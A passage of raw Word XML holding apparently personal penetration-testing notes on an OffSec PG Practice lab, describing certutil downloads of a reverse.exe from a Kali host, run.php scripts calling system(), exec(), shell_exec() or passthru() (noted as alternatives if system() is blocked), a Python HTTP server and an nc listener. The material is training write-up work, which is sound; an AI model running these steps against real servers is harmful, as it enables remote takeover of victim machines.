      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The 80 is for port 80, so replace it with whatever you are use for python host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EC6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EC7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This uses Windows built-in certutil.exe to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="437"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-urlcache -split -f: download a file from a remote URL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="437"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Downloads your reverse shell executable (reverse.exe) from your Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ECA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="437"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Saves it as reverse.exe on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ECB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So this script pulls the malware onto the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ECC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this script, $val will contain 0 if the command succeeded, or a non-zero value if it failed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ECD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ECE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ECF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ED0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('reverse.exe', $val)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ED1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ED2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system() </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">causes PHP to immediately print the output of the command as it comes in (this is different from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exec()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which captures it silently).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ED3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This executes reverse.exe on the victim machine, triggering the reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ED4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is how to execute a reverse shell using PHP code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ED5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="998"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId317">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">MedJed</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, we saw another run.php file</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ED7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="998"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ED8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="998"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('C:/Users/Jerren/Desktop/reverse.exe', $val)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ED9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="998"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="998"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$val </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is an optional second parameter to system().</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EDB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="998"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It captures the exit status code of the executed command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EDC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="998"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this script, $val will contain 0 if the command succeeded, or a non-zero value if it failed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EDD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EDE">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HERE ARE SOME ALTERNATIVES TO system() (like in case system() is blocked):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EDF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exec() </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">– captures output instead of printing it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EE0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exec('reverse.exe', $output, $exit_code);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So just make sure to include a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> $output </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">variable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell_exec() </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">– returns the entire output as a string.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$output = shell_exec('reverse.exe');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EE4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passthru() </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">– like system() but used for raw binary output (e.g. images, compiled output).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EE5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passthru('reverse.exe', $exit_code);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EE6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EE7">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: Upload scripts onto Web Server and then open a python host with your reverse.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="791"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="791"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure the port matches whatever the port is on upload.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EEA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EEB">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: Trigger the scripts via web server</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Visit in browser:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EEE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://target/upload.ph</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1397"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This runs certutil.exe on the server, which pulls down your reverse.exe from your Kali machine.</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EF2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="510"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap nc -lvnp 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EF3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EF4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, visit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://target/run.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This executes reverse.exe, which then connects back to you.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open listener first</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EF8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EF9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
